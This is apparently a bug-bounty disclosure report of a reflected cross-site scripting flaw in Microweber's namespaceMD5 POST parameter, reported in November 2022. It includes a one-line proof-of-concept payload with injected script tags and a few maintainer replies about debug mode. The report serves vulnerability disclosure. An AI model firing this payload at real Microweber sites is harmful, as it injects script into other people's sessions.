Post parameter namespaceMD5 is vulnerable to reflected XSS in microweber/microweber
Reported on
Nov 8th 2022
Description
The POST parameter namespaceMD5
is vulnerable to reflected XSS.
Proof of Concept
// POST request to /module with parameters and payload
namespaceMD5=3389dae361af79b04c9c8e7057f60cc6test}'')"><script>alert()</script><script>alert()</script>&module=settings%2Fgroup%2Flanguage_import&id=mw_admin_import_language_modal_content
Impact
JS injection.
Occurrences
Hello
This error appears only when you have enable the debug mode. Currently on the demo site the debug mode is enabled and that's why you see the error
On user sites an on production sites, the debug mode is not enabled
oops sorry , i replied to the wrong vulnerability , checking this now